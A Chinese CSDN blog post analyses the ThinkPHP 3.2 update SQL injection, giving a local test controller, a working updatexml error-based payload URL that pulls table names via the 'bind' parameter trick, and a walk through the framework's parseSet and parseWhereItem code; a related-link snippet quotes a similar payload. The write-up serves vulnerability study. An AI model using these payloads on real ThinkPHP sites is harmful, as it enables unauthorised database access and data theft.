thinkphp3.2 update注入

于 2022-07-11 21:59:56 发布
阅读量420 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/125708333
版权

TestController.class.php

<?php
namespace Home\Controller;
use Think\Controller;
class TestController extends Controller {
    public function index(){
        $username = $_GET['username'];
        $data=M('users')->where(array("username"=>$username))->find();
        dump($data);


    }

    public function login(){
        $this->display();
    }
    public function insert(){
        $condition['username'] = I('username');
        $data['password'] = I('password');
        $result = M('users')->where($condition)->save($data);
        dump($result);
    }

}

updata注入
http://127.0.0.1/index.php/home/test/insert?username[0]=bind&username[1]=0 and 1=(updatexml(1,concat(0x7e,(select%20(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%202,1)),0x7e),1))%23 &password=123456

造成注入的问题主要时function parseSet()和 protected function parseWhere()

protected function parseSet($data) {
        foreach ($data as $key=>$val){
            if(is_array($val) && 'exp' == $val[0]){
                $set[]  =   $this->parseKey($key).'='.$val[1];
            }elseif(is_null($val)){
                $set[]  =   $this->parseKey($key).'=NULL';
            }elseif(is_scalar($val)) {// 过滤非标量数据
                if(0===strpos($val,':') && in_array($val,array_keys($this->bind)) ){
                    $set[]  =   $this->parseKey($key).'='.$this->escapeString($val);
                }else{
                    $name   =   count($this->bind);
                    $set[]  =   $this->parseKey($key).'=:'.$name;
                    $this->bindParam($name,$val);
                }
            }
        }

这里接收password的数据,代码直接到

else{
                    $name   =   count($this->bind);//name=0
                    $set[]  =   $this->parseKey($key).'=:'.$name;//set[]=`password` =:0
                    $this->bindParam($name,$val);
                }
            }
        }
 return ' SET '.implode(',',$set);//set `password` =:0

这样拼接的sql语句为 set set password =:0

				 protected function parseWhereItem($key,$val) {
        $whereStr = '';
        if(is_array($val)) {
            if(is_string($val[0])) {
				$exp	=	strtolower($val[0]);
                if(preg_match('/^(eq|neq|gt|egt|lt|elt)$/',$exp)) { // 比较运算
                    $whereStr .= $key.' '.$this->exp[$exp].' '.$this->parseValue($val[1]);
                }elseif(preg_match('/^(notlike|like)$/',$exp)){// 模糊查找
                    if(is_array($val[1])) {
                        $likeLogic  =   isset($val[2])?strtoupper($val[2]):'OR';
                        if(in_array($likeLogic,array('AND','OR','XOR'))){
                            $like       =   array();
                            foreach ($val[1] as $item){
                                $like[] = $key.' '.$this->exp[$exp].' '.$this->parseValue($item);
                            }
                            $whereStr .= '('.implode(' '.$likeLogic.' ',$like).')';                          
                        }
                    }else{
                        $whereStr .= $key.' '.$this->exp[$exp].' '.$this->parseValue($val[1]);
                    }
                }elseif('bind' == $exp ){ // 使用表达式
                    $whereStr .= $key.' = :'.$val[1];
                }elseif('exp' == $exp ){ // 使用表达式
                    $whereStr .= $key.' '.$val[1];
                }elseif(preg_match('/^(notin|not in|in)$/',$exp)){ // IN 运算
                    if(isset($val[2]) && 'exp'==$val[2]) {
                        $whereStr .= $key.' '.$this->exp[$exp].' '.$val[1];
                    }else{
                        if(is_string($val[1])) {
                             $val[1] =  explode(',',$val[1]);
                        }
                        $zone      =   implode(',',$this->parseValue($val[1]));
                        $whereStr .= $key.' '.$this->exp[$exp].' ('.$zone.')';
                    }
                }elseif(preg_match('/^(notbetween|not between|between)$/',$exp)){ // BETWEEN运算
                    $data = is_string($val[1])? explode(',',$val[1]):$val[1];
                    $whereStr .=  $key.' '.$this->exp[$exp].' '.$this->parseValue($data[0]).' AND '.$this->parseValue($data[1]);
                }else{
                    E(L('_EXPRESS_ERROR_').':'.$val[0]);
                }
            }else {
                $count = count($val);
                $rule  = isset($val[$count-1]) ? (is_array($val[$count-1]) ? strtoupper($val[$count-1][0]) : strtoupper($val[$count-1]) ) : '' ; 
                if(in_array($rule,array('AND','OR','XOR'))) {
                    $count  = $count -1;
                }else{
                    $rule   = 'AND';
                }
                for($i=0;$i<$count;$i++) {
                    $data = is_array($val[$i])?$val[$i][1]:$val[$i];
                    if('exp'==strtolower($val[$i][0])) {
                        $whereStr .= $key.' '.$data.' '.$rule.' ';
                    }else{
                        $whereStr .= $this->parseWhereItem($key,$val[$i]).' '.$rule.' ';
                    }
                }
                $whereStr = '( '.substr($whereStr,0,-4).' )';
            }
        }else {
            //对字符串类型字段采用模糊匹配
            $likeFields   =   $this->config['db_like_fields'];
            if($likeFields && preg_match('/^('.$likeFields.')$/i',$key)) {
                $whereStr .= $key.' LIKE '.$this->parseValue('%'.$val.'%');
            }else {
                $whereStr .= $key.' = '.$this->parseValue($val);
            }
        }
        return $whereStr;
    }

这里接受username的数据,如果数据0的数据为bind

elseif('bind' == $exp ){ // 使用表达式
                    $whereStr .= $key.' = :'.$val[1];

sql语句为username :0 and 1=(updatexml(1,concat(0x7e,(select (select table_name from information_schema.tables where table_schema=database() limit 2,1)),0x7e),1))#

将这两个语句拼接为UPDATE users SET password=:0 WHERE username = :0 and 1=(updatexml(1,concat(0x7e,(select (select table_name from information_schema.tables where table_schema=database() limit 2,1)),0x7e),1))#

最后会经过一个函数将:0都转为1234
UPDATE users SET password=1234 WHERE username = 1234 and 1=(updatexml(1,concat(0x7e,(select (select table_name from information_schema.tables where table_schema=database() limit 2,1)),0x7e),1))#

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
Ueditor for Thinkphp3.2
06-14
百度Ueditor,支持Thinkphp3.2。官网上有,在这用来存档,如果你需要,也可以下载。
thinkPHP3.2使用RBAC实现权限管理的实现
10-16
主要介绍了thinkPHP3.2使用RBAC实现权限管理的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
thinkphp3.2 webuploader较大视频文件分段上传方法demo
06-27
thinkphp3.2 webuploader较大视频文件分段上传方法demo,大视频分段上传,上传完成后又将分段视频合并成一个视频文件。
thinkPHP3.2简单实现文件上传的方法
10-22
主要介绍了thinkPHP3.2简单实现文件上传的方法,重点介绍了thinkPHP实现文件上传功能的控制器文件相关技巧,需要的朋友可以参考下
10-PHP代码审计——thinkphp3.2.3 update注入漏洞
网络安全
05-06 852
实验环境的poc: http://www.tptest.com/index.php/home/index/index?username[0]=bind&username[1]=0%20and%201=(updatexml(1,concat(0x3a,(user())),1))%23&password=123456 通过更改用户密码的案例来分析update注入漏洞的过程: 在分析之前,先梳理一下漏洞利用的过程,update注入的流程是:M函数 --> where函...
Think PHP3.2.3 update(blind)注入
D.MIND 的博客
04-14 333
前言: 第一次尝试TP框架的代码审计,搭环境的过程有点坎坷…但勉勉强强还是完成了。原本以为审计起来不会太吃力,审计完才发现自己对工业化的代码框架认知程度远远不够,所以整个过程都比较艰辛,整理出来的东西还是不够清晰明了,下次再接再厉。坚持下去,死磕吧。┭┮﹏┭┮ Think PHP3.2.3 update(blind)注入 漏洞简述 尽管ThinkPHP 3.2.x使用了 I 方法来过滤参数,但是还是过滤不严谨,导致SQL注入发生。 ThinkPHP 3.2.3 目录结构 下载框架后,解压缩到web目录下面
Thinkphp3.2.3最新版update注入漏洞
Fly_鹏程万里
12-13 9567
简要描述  thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,其中Thinkphp3.2.3是目前使用最广泛的thinkphp版本,虽然已经停止新功能的开发,但是普及度高于新出的thinkphp5系列,由于框架实现安全数据库过程中在update更新数据的过程中存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入。 Git补丁更新 新增加了BIND表...
thinkphp 表达式更新
hyb1234hi的专栏
10-29 201
1. M('users_coin')-&gt;where("uid={$uid} and type='{$type}'")-&gt;setField(array('available'=&gt;array('exp','available-'.$total_amont),'c2c_freeze'=&gt;array('exp','c2c_freeze+'.$total_amont))); 2...
thinkphp更新update操作
silk_java的专栏
01-25 8492
更新(Update) 在ThinkPHP中使用save方法更新数据库,并且也支持连贯操作的使用。 save 更新数据到数据库 用法 save($data='',$options=array()) 参数 data:要保存的数据,如果为空,则取当前的数据对象。 options:为数组的时候表示操作表达式,通常由连贯操作完成;为数字或者字符串
ThinkPHP5.1.x SQL注入update方法)
LYJ20010728的博客
08-13 1294
ThinkPHP5 SQL注入update方法)漏洞概要初始配置 漏洞概要 本次漏洞存在于 Mysql 类的 parseArrayData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生 漏洞影响版本: 5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用) 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink/think tpd
php模型update,thinkphp5.1的model模型自动更新update_time字段实例讲解
weixin_31183253的博客
03-17 712
这篇文章主要介绍了thinkphp5.1的model模型自动更新update_time字段实例讲解,文章代码示例比较简单实用,有正在学习tp的同学可以跟着小编好好阅读下1、model模型开启自动完成时间戳功能...
Thinkphp框架 3.2.x sql注入漏洞
小小猪的博客
11-15 1520
Thinkphp框架 3.2.x sql注入漏洞 环境搭建 程序下载地址:地址PHPstudy:Apache+php7.1+MySQL 工具:PHPstorm 首先建立一个数据库名为:thinkphp 建立一个表名为:user 添加两个字段:name,pass thinkphp3.2版本和之前的5版本略有不同,它的数据库信息文件是在 这个文件:thinkphp/ThinkPHP/Conf/convention.php在这里...
thinkphp add update Delete操作
title
05-20 705
============add====================== $User = M("message"); $data['name'] =$_POST['name']; $data['email'] = $_POST['email']; $data['content'] = $_POST['content']; $data['ip'] = $_SERVER["RE
ThinkPHP 更新数据的常用三大方法
阿信随笔的博客
08-18 6316
crud在tp中重要性不言而喻,这里谈的是更新update在tp中的几个方法: save() 用于向数据表更新数据,相当于 SQL 中的 UPDATE 行为。一般使用 save() 方法来更新数据库,并且也支持连贯操作的使用。   $Dao->where($condition)->save($data); //或者:$Dao->where($condition)->data
how to use thinkPHP model to update update_time in DB automatically
sandalwoodscn73的博客
11-28 141
Must use update first then where, the update data must contain the primary key of the table otherwise can not updated automatically. if(PositionModel::update($data)-&gt;where(‘id’, $applied_id)){ retu...
记一次渗透测试中thinkphp3.2.3 update注入
isxiaole的博客
04-29 745
. 背景介绍 在一次做渗透时,首先从领导那拿到客户需要做测试的后台URL。果然,一如既往的登录页面,但发现没有验证码验证策略,那咱先就抓个包试试登录爆破呗(爆破用Cluster bomb选项,此处不再阐述)。拿到后台口令–admin/admin123 857-857丶我估计以我的运气手动也能测出来,但客户为啥不提前给我呢~~ 摸索过程 使用Google的附件Wappalyzer查到用户使用的是thinkphp3框架。thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,..
ThinkPhp3.2】关于update指定了条件,但是进行了全表更新
咔咔博客
08-26 1735
案例:将时间过期的状态码给为3 解析上边案例 这条语句是在tp5特别常用的语句 data=D(′goodscoupon′)−&gt;where(′id′,data = D(&#x27;goodscoupon&#x27;)-&gt;where(&#x27;id&#x27;,data=D(′goodscoupon′)−>where(′id′,v...
thinkphp3.2下载
最新发布
09-27
ThinkPHP 3.2是ThinkPHP框架的一个历史版本,它在运行速度、安全性以及开发效率上都有不错的表现。 要下载ThinkPHP 3.2,首先需要打开ThinkPHP的官方网站(www.thinkphp.cn)。在官网主页上,我们可以找到“下载”...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值